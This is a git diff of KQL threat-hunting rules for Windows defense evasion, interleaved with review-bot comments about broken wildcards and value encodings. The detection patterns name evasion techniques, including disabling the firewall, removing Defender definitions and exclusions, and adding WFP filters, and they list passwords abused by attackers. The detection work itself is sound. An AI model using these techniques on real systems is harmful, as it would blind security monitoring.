--- a/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql
+++ b/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql
@@ -1,12 +1,12 @@
-// Title: Use Short Name Path in Image
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022-08-07
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004
-// False Positives:
-// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
-
-DeviceProcessEvents
+// Title: Use Short Name Path in Image
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-07
+// Level: medium
+// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
+
+DeviceProcessEvents
 | where (FolderPath contains "~1\\" or FolderPath contains "~2\\") and (not((((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or (FolderPath endswith "~1\\unzip.exe" or FolderPath endswith "~1\\7zG.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe"))))) and (not(((ProcessVersionInfoProductName =~ "InstallShield (R)" or ProcessVersionInfoFileDescription =~ "InstallShield (R) Setup Engine" or ProcessVersionInfoCompanyName =~ "InstallShield Software Corporation") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql b/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql
index bd08cdeb..a7ca7eff 100644
--- a/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql
+++ b/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql
@@ -1,10 +1,10 @@
-// Title: UtilityFunctions.ps1 Proxy Dll
-// Author: frack113
-// Date: 2022-05-28
-// Level: medium
-// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1216
-
-DeviceProcessEvents
+// Title: UtilityFunctions.ps1 Proxy Dll
+// Author: frack113
+// Date: 2022-05-28
+// Level: medium
+// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "UtilityFunctions.ps1" or ProcessCommandLine contains "RegSnapin "
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql b/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql
index 60a0d7e0..2819ae55 100644
--- a/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql
+++ b/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql
@@ -1,10 +1,10 @@
-// Title: Verclsid.exe Runs COM Object
-// Author: Victor Sergeev, oscd.community
-// Date: 2020-10-09
-// Level: medium
-// Description: Detects when verclsid.exe is used to run COM object via GUID
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Verclsid.exe Runs COM Object
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects when verclsid.exe is used to run COM object via GUID
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "/S" and ProcessCommandLine contains "/C") and (FolderPath endswith "\\verclsid.exe" or ProcessVersionInfoOriginalFileName =~ "verclsid.exe")) and (not(((ProcessCommandLine contains "verclsid.exe\" /S /C {" and ProcessCommandLine contains "} /I {") and InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\RuntimeBroker.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql b/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql
index bc434146..1b3bdc3b 100644
--- a/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql
+++ b/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql
@@ -1,12 +1,12 @@
-// Title: Virtualbox Driver Installation or Starting of VMs
-// Author: Janantha Marasinghe
-// Date: 2020-09-26
-// Level: low
-// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.006, attack.t1564
-// False Positives:
-// - This may have false positives on hosts where Virtualbox is legitimately being used for operations
-
-DeviceProcessEvents
+// Title: Virtualbox Driver Installation or Starting of VMs
+// Author: Janantha Marasinghe
+// Date: 2020-09-26
+// Level: low
+// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.006, attack.t1564
+// False Positives:
+// - This may have false positives on hosts where Virtualbox is legitimately being used for operations
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "VBoxRT.dll,RTR3Init" or ProcessCommandLine contains "VBoxC.dll" or ProcessCommandLine contains "VBoxDrv.sys") or (ProcessCommandLine contains "startvm" or ProcessCommandLine contains "controlvm")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql b/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql
index be703a9c..d48b4aca 100644
--- a/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql
+++ b/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql
@@ -1,12 +1,12 @@
-// Title: Visual Basic Command Line Compiler Usage
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020-10-07
-// Level: high
-// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027.004
-// False Positives:
-// - Utilization of this tool should not be seen in enterprise environment
-
-DeviceProcessEvents
+// Title: Visual Basic Command Line Compiler Usage
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-07
+// Level: high
+// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004
+// False Positives:
+// - Utilization of this tool should not be seen in enterprise environment
+
+DeviceProcessEvents
 | where FolderPath endswith "\\cvtres.exe" and InitiatingProcessFolderPath endswith "\\vbc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql b/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql
index be902c9a..fc73bb67 100644
--- a/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql
+++ b/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql
@@ -1,10 +1,10 @@
-// Title: Wab Execution From Non Default Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-12
-// Level: high
-// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution
-
-DeviceProcessEvents
+// Title: Wab Execution From Non Default Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql b/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql
index 593ea03a..23d1fead 100644
--- a/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql
+++ b/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql
@@ -1,10 +1,10 @@
-// Title: Wab/Wabmig Unusual Parent Or Child Processes
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-12
-// Level: high
-// Description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution
-
-DeviceProcessEvents
+// Title: Wab/Wabmig Unusual Parent Or Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath endswith "\\wab.exe" or InitiatingProcessFolderPath endswith "\\wabmig.exe") or ((FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql
index aee95ba2..1fa517ab 100644
--- a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql
+++ b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql
@@ -1,14 +1,14 @@
-// Title: Weak or Abused Passwords In CLI
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-14
-// Level: medium
-// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
-// An example would be a threat actor creating a new user via the net command and providing the password inline
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution
-// False Positives:
-// - Legitimate usage of the passwords by users via commandline (should be discouraged)
-// - Other currently unknown false positives
-
-DeviceProcessEvents
+// Title: Weak or Abused Passwords In CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
+// An example would be a threat actor creating a new user via the net command and providing the password inline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+// - Legitimate usage of the passwords by users via commandline (should be discouraged)
+// - Other currently unknown false positives
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql
index e899bc16..c37cfb49 100644
--- a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql
+++ b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql
@@ -1,10 +1,10 @@
-// Title: WFP Filter Added via Registry
-// Author: Frack113
-// Date: 2025-10-23
-// Level: medium
-// Description: Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1562, attack.t1569.002
-
-DeviceRegistryEvents
+// Title: WFP Filter Added via Registry
+// Author: Frack113
+// Date: 2025-10-23
+// Level: medium
+// Description: Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1562, attack.t1569.002
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\BFE\\Parameters\\Policy\\Persistent\\Filter*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql b/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql
index 2858ebb0..2a65cb74 100644
--- a/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql
+++ b/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql
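Review bot: `| where RegistryKey endswith "\\BFE\\Parameters\\Policy\\Persistent\\Filter*"` keeps the Sigma trailing wildcard as a literal asterisk, so the condition only matches keys that actually end in `*` and the rule never fires on real telemetry. The wildcard should be dropped in favour of a substring test, e.g. `| where RegistryKey contains "\\BFE\\Parameters\\Policy\\Persistent\\Filter" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe"))))`. The same literal-`*` output appears in the Exclusion List Modified hunk (`endswith "\\Microsoft\\Windows Defender\\Exclusions*"`), the Threat Severity Default Action hunk (`endswith "...ThreatSeverityDefaultAction*"`) and the Winget Admin Settings hunk (`RegistryKey =~ "\\REGISTRY\\A*"`), which points at the converter's handling of trailing wildcards rather than a per-rule typo. The affected line is unchanged context in this hunk, but it is the rule's entire match condition.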
@@ -1,10 +1,10 @@
-// Title: Windows Binaries Write Suspicious Extensions
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-12
-// Level: high
-// Description: Detects Windows executables that write files with suspicious extensions
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceFileEvents
+// Title: Windows Binaries Write Suspicious Extensions
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects Windows executables that write files with suspicious extensions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceFileEvents
 | where (((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".txt" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")) or ((InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs"))) and (not(((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dllhost.exe" and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\__PSScriptPolicyTest_") and FolderPath endswith ".ps1") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Program Files\\WindowsApps\\Clipchamp" and FolderPath contains ".ps1")) or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) and FolderPath endswith ".ps1" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\Microsoft.PowerShellPreview")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Windows\\System32\\GroupPolicy\\DataStore\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath contains "\\Machine\\Scripts\\Startup\\") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql
index e664bc20..62c27b50 100644
--- a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql
+++ b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql
@@ -1,14 +1,14 @@
-// Title: Windows Defender Context Menu Removed
-// Author: Matt Anderson (Huntress)
-// Date: 2025-07-09
-// Level: high
-// Description: Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys.
-// This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives.
-// Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - May be part of a system customization or "debloating" script, but this is highly unusual in a managed corporate environment.
-
-DeviceProcessEvents
+// Title: Windows Defender Context Menu Removed
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-09
+// Level: high
+// Description: Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys.
+// This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives.
+// Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - May be part of a system customization or "debloating" script, but this is highly unusual in a managed corporate environment.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "del" or ProcessCommandLine contains "Remove-Item" or ProcessCommandLine contains "ri ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll", "reg.exe"))) and ProcessCommandLine contains "\\shellex\\ContextMenuHandlers\\EPP"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql b/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql
index 181d55b8..50cef6d8 100644
--- a/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql
+++ b/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql
@@ -1,10 +1,10 @@
-// Title: Windows Defender Definition Files Removed
-// Author: frack113
-// Date: 2021-07-07
-// Level: high
-// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceProcessEvents
+// Title: Windows Defender Definition Files Removed
+// Author: frack113
+// Date: 2021-07-07
+// Level: high
+// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -RemoveDefinitions" and ProcessCommandLine contains " -All") and (FolderPath endswith "\\MpCmdRun.exe" or ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql
index feb92ebb..fe85c5a5 100644
--- a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql
+++ b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql
@@ -1,12 +1,12 @@
-// Title: Windows Defender Exclusion List Modified
-// Author: @BarryShooshooga
-// Date: 2019-10-26
-// Level: medium
-// Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Intended exclusions by administrators
-
-DeviceRegistryEvents
+// Title: Windows Defender Exclusion List Modified
+// Author: @BarryShooshooga
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Intended exclusions by administrators
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Microsoft\\Windows Defender\\Exclusions*"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql b/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql
index 2e6cac82..c611b785 100644
--- a/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql
+++ b/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql
@@ -1,12 +1,12 @@
-// Title: Windows Defender Exclusions Added - Registry
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-07-06
-// Level: medium
-// Description: Detects the Setting of Windows Defender Exclusions
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Administrator actions
-
-DeviceRegistryEvents
+// Title: Windows Defender Exclusions Added - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-07-06
+// Level: medium
+// Description: Detects the Setting of Windows Defender Exclusions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator actions
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql b/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql
index e88fe052..bb34d560 100644
--- a/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql
+++ b/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql
@@ -1,12 +1,12 @@
-// Title: Windows Defender Service Disabled - Registry
-// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
-// Date: 2022-08-01
-// Level: high
-// Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Administrator actions
-
-DeviceRegistryEvents
+// Title: Windows Defender Service Disabled - Registry
+// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
+// Date: 2022-08-01
+// Level: high
+// Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator actions
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000004)" and RegistryKey endswith "\\Services\\WinDefend\\Start"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql
index 9575bbfd..1496fade 100644
--- a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql
+++ b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql
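Review bot: `RegistryValueData =~ "DWORD (0x00000004)"` compares against Sysmon's rendering of a DWORD value, which DeviceRegistryEvents does not appear to emit — advanced hunting seems to surface the numeric data as a plain string (e.g. `4`) with the type carried separately in RegistryValueType — so this rule would never match on Defender for Endpoint telemetry; please confirm against live events before merging. If that is the case the condition should read `| where RegistryValueData =~ "4" and RegistryKey endswith "\\Services\\WinDefend\\Start"`, or tolerate both encodings with `RegistryValueData in~ ("4", "DWORD (0x00000004)")`. The Threat Severity Default Action hunk carries the same `"DWORD (0x0000000N)"` comparison and needs the same treatment.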
@@ -1,15 +1,15 @@
-// Title: Windows Defender Threat Severity Default Action Modified
-// Author: Matt Anderson (Huntress)
-// Date: 2025-07-11
-// Level: high
-// Description: Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'.
-// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,
-// allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity.
-// - Software installations that legitimately modify Defender settings (less common for these specific keys).
-
-DeviceRegistryEvents
+// Title: Windows Defender Threat Severity Default Action Modified
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-11
+// Level: high
+// Description: Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'.
+// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,
+// allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity.
+// - Software installations that legitimately modify Defender settings (less common for these specific keys).
+
+DeviceRegistryEvents
 | where (RegistryValueData in~ ("DWORD (0x00000006)", "DWORD (0x00000009)")) and RegistryKey endswith "\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction*" and (RegistryKey endswith "\\1" or RegistryKey endswith "\\2" or RegistryKey endswith "\\4" or RegistryKey endswith "\\5")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql b/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql
index b82d4d35..faaedb7c 100644
--- a/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql
+++ b/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql
@@ -1,10 +1,10 @@
-// Title: Windows Firewall Disabled via PowerShell
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022-09-14
-// Level: medium
-// Description: Detects attempts to disable the Windows Firewall using PowerShell
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562
-
-DeviceProcessEvents
+// Title: Windows Firewall Disabled via PowerShell
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects attempts to disable the Windows Firewall using PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Set-NetFirewallProfile " and ProcessCommandLine contains " -Enabled " and ProcessCommandLine contains " False") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains " -All " or ProcessCommandLine contains "Public" or ProcessCommandLine contains "Domain" or ProcessCommandLine contains "Private")
\ No newline at end of file
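Review bot: The `| where` clause requires `RegistryKey endswith "\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction*"` and, in the same conjunction, `RegistryKey endswith "\\1"` (or `\\2`, `\\4`, `\\5`); a key cannot end with both strings, so the predicate is unsatisfiable and the rule can never produce a hit. The intended shape is presumably a match on the parent key plus the severity-id suffix, e.g. `RegistryKey contains "\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction" and (RegistryKey endswith "\\1" or RegistryKey endswith "\\2" or RegistryKey endswith "\\4" or RegistryKey endswith "\\5")`. Because this is a high-severity rule guarding Defender's automatic remediation, a silently dead predicate is worth catching with a positive test event before the generated output is shipped. The hunk begins on the preceding diff line; only its tail is shown here.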
diff --git a/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql b/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql
index abfc6b7e..6d8929df 100644
--- a/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql
+++ b/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql
@@ -1,12 +1,12 @@
-// Title: Windows Kernel Debugger Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-15
-// Level: medium
-// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation
-// False Positives:
-// - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required
-
-DeviceProcessEvents
+// Title: Windows Kernel Debugger Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
